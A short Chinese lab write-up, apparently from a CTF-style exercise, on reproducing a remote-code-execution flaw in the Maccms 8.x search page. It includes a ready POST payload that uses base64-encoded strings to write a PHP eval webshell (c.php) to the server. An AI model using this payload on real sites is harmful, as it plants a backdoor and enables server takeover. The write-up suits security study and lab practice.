一、漏洞简介
魅魔电影程序(Maccms PHP)是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。该漏洞主要的产生原因是CMS搜索页面搜索参数过滤不严导致直接eval执行PHP语句。
二、漏洞影响
Maccms8.x
三、漏洞复现
1、访问特定URLhttp://ip:port/index.php?m=vod-search
2、开启抓包
修改一:
改为POST请求
修改二:
添加POST提交的数据 上传一句话木马
wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}
3、 访问页面测试是否上传成功 c.php密码c
4、链接后门获取flag